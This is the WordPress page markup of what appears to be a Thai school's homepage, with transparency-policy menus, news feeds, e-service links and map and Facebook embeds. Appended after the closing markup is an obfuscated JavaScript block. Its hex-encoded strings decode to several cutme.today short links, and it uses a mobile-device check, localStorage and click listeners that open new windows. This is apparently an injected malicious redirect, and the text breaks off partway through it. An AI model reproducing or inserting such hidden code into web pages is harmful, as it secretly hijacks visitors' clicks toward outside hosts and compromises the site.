Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 